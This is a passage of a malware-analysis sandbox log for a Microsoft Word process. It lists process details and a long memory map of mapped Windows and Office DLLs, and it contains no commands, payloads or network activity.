# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Sep 28 2017 17:24:42 # Log Creation Date: 11.10.2017 11:00:52.313 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office15\\winword.exe" page_root = "0x7eef76e0" os_pid = "0x98c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 140 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 141 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 142 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 143 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 144 start_va = 0xf0000 end_va = 0x1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 145 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 146 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 147 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 148 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 149 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 150 start_va = 0x400000 end_va = 0x401fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 151 start_va = 0x410000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 152 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 153 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 154 start_va = 0x530000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 155 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 156 start_va = 0x580000 end_va = 0x65efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 157 start_va = 0x660000 end_va = 0x666fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 158 start_va = 0x670000 end_va = 0x671fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 159 start_va = 0x680000 end_va = 0x680fff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 160 start_va = 0x690000 end_va = 0x691fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 161 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 162 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 163 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 164 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 165 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 166 start_va = 0x6f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 167 start_va = 0x700000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 168 start_va = 0x800000 end_va = 0x800fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 169 start_va = 0x810000 end_va = 0x810fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 170 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 171 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 172 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 173 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 174 start_va = 0x860000 end_va = 0x860fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 175 start_va = 0x870000 end_va = 0x870fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 176 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 177 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 178 start_va = 0x8a0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 179 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 180 start_va = 0x9b0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 181 start_va = 0x9d0000 end_va = 0x9d0fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 182 start_va = 0x9e0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 183 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 184 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 185 start_va = 0xa10000 end_va = 0xa13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 186 start_va = 0xa20000 end_va = 0xa20fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 187 start_va = 0xa30000 end_va = 0xa30fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 188 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 189 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 190 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 191 start_va = 0xad0000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 192 start_va = 0xae0000 end_va = 0xae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 193 start_va = 0xaf0000 end_va = 0xaf0fff entry_point = 0xaf0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 194 start_va = 0xb00000 end_va = 0xb25fff entry_point = 0xb00000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 195 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 196 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 197 start_va = 0xb80000 end_va = 0xb90fff entry_point = 0xb80000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 198 start_va = 0xba0000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 199 start_va = 0xca0000 end_va = 0x1092fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 200 start_va = 0x10a0000 end_va = 0x10a0fff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 201 start_va = 0x10b0000 end_va = 0x10b0fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 202 start_va = 0x10c0000 end_va = 0x10c0fff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 203 start_va = 0x10d0000 end_va = 0x10eefff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 204 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 205 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 206 start_va = 0x1110000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 207 start_va = 0x1120000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 208 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 209 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 210 start_va = 0x11c0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 211 start_va = 0x12c0000 end_va = 0x12c0fff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 212 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 213 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 214 start_va = 0x12f0000 end_va = 0x12f0fff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 215 start_va = 0x1300000 end_va = 0x14d6fff entry_point = 0x1300000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office15\\winword.exe") Region: id = 216 start_va = 0x14e0000 end_va = 0x20dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014e0000" filename = "" Region: id = 217 start_va = 0x20e0000 end_va = 0x23aefff entry_point = 0x20e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 218 start_va = 0x23b0000 end_va = 0x23b0fff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 219 start_va = 0x23c0000 end_va = 0x23c0fff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 220 start_va = 0x23d0000 end_va = 0x23d0fff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 221 start_va = 0x23e0000 end_va = 0x23e0fff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 222 start_va = 0x23f0000 end_va = 0x23f0fff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 223 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 224 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 225 start_va = 0x2420000 end_va = 0x2420fff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 226 start_va = 0x2430000 end_va = 0x2430fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 227 start_va = 0x2440000 end_va = 0x2440fff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 228 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 229 start_va = 0x2460000 end_va = 0x2461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 230 start_va = 0x24f0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 231 start_va = 0x2640000 end_va = 0x273ffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 232 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 233 start_va = 0x27a0000 end_va = 0x2b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 234 start_va = 0x2ba0000 end_va = 0x34cffff entry_point = 0x2ba0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 235 start_va = 0x34d0000 end_va = 0x3ccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034d0000" filename = "" Region: id = 236 start_va = 0x3d10000 end_va = 0x3d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 237 start_va = 0x3db0000 end_va = 0x3dbffff entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 238 start_va = 0x3dd0000 end_va = 0x3ecffff entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 239 start_va = 0x3ed0000 end_va = 0x3f4efff entry_point = 0x3ed0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 240 start_va = 0x3f80000 end_va = 0x407ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 241 start_va = 0x4080000 end_va = 0x413ffff entry_point = 0x4080000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 242 start_va = 0x4140000 end_va = 0x423ffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 243 start_va = 0x4240000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 244 start_va = 0x4340000 end_va = 0x443ffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 245 start_va = 0x4440000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 246 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 247 start_va = 0x4660000 end_va = 0x4a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 248 start_va = 0x4a60000 end_va = 0x4ac3fff entry_point = 0x4a60000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 249 start_va = 0x4b10000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 250 start_va = 0x4d30000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 251 start_va = 0x4d70000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 252 start_va = 0x5170000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 253 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 254 start_va = 0x5770000 end_va = 0x5f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 255 start_va = 0x5f70000 end_va = 0x6370fff entry_point = 0x0 region_type = private name = "private_0x0000000005f70000" filename = "" Region: id = 256 start_va = 0x6380000 end_va = 0x6780fff entry_point = 0x0 region_type = private name = "private_0x0000000006380000" filename = "" Region: id = 257 start_va = 0x6790000 end_va = 0x6b90fff entry_point = 0x0 region_type = private name = "private_0x0000000006790000" filename = "" Region: id = 258 start_va = 0x6ba0000 end_va = 0x6d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ba0000" filename = "" Region: id = 259 start_va = 0x6da0000 end_va = 0x725ffff entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 260 start_va = 0x7260000 end_va = 0x765ffff entry_point = 0x0 region_type = private name = "private_0x0000000007260000" filename = "" Region: id = 261 start_va = 0x7660000 end_va = 0x7e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000007660000" filename = "" Region: id = 262 start_va = 0x36890000 end_va = 0x3689ffff entry_point = 0x0 region_type = private name = "private_0x0000000036890000" filename = "" Region: id = 263 start_va = 0x63a70000 end_va = 0x63a9cfff entry_point = 0x63a70000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 264 start_va = 0x63aa0000 end_va = 0x63c2dfff entry_point = 0x63aa0000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 265 start_va = 0x63c30000 end_va = 0x63ce4fff entry_point = 0x63c30000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 266 start_va = 0x63cf0000 end_va = 0x63d69fff entry_point = 0x63cf0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 267 start_va = 0x63e40000 end_va = 0x63f49fff entry_point = 0x63e40000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 268 start_va = 0x63f50000 end_va = 0x6407bfff entry_point = 0x63f50000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 269 start_va = 0x64080000 end_va = 0x68d6afff entry_point = 0x64080000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 270 start_va = 0x68d70000 end_va = 0x6a653fff entry_point = 0x68d70000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 271 start_va = 0x6a660000 end_va = 0x6bb1bfff entry_point = 0x6a660000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\wwlib.dll") Region: id = 272 start_va = 0x6bb30000 end_va = 0x6bb79fff entry_point = 0x6bb30000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 273 start_va = 0x6bb80000 end_va = 0x6bc02fff entry_point = 0x6bb80000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 274 start_va = 0x6bc10000 end_va = 0x6bd25fff entry_point = 0x6bc10000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll") Region: id = 275 start_va = 0x6bd30000 end_va = 0x6c0a0fff entry_point = 0x6bd30000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 276 start_va = 0x6c0b0000 end_va = 0x6c16ffff entry_point = 0x6c0b0000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll") Region: id = 277 start_va = 0x6c170000 end_va = 0x6c229fff entry_point = 0x6c170000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 278 start_va = 0x6c230000 end_va = 0x6cfd7fff entry_point = 0x6c230000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 279 start_va = 0x6f5b0000 end_va = 0x6f600fff entry_point = 0x6f5b0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 280 start_va = 0x6fa80000 end_va = 0x6fbd7fff entry_point = 0x6fa80000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 281 start_va = 0x70ac0000 end_va = 0x70fbffff entry_point = 0x70ac0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 282 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 283 start_va = 0x71230000 end_va = 0x71298fff entry_point = 0x71230000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 284 start_va = 0x712a0000 end_va = 0x7135efff entry_point = 0x712a0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 285 start_va = 0x716f0000 end_va = 0x71772fff entry_point = 0x716f0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 286 start_va = 0x71780000 end_va = 0x717b9fff entry_point = 0x71780000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 287 start_va = 0x717c0000 end_va = 0x717ebfff entry_point = 0x717c0000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 288 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 289 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 290 start_va = 0x71ee0000 end_va = 0x71ef4fff entry_point = 0x71ee0000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 291 start_va = 0x71fc0000 end_va = 0x71fc4fff entry_point = 0x71fc0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 292 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735e0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 293 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 294 start_va = 0x73840000 end_va = 0x739cffff entry_point = 0x73840000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 295 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739d0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 296 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x74180000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 297 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 298 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74600000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 299 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x74800000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 300 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74940000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 301 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 302 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" 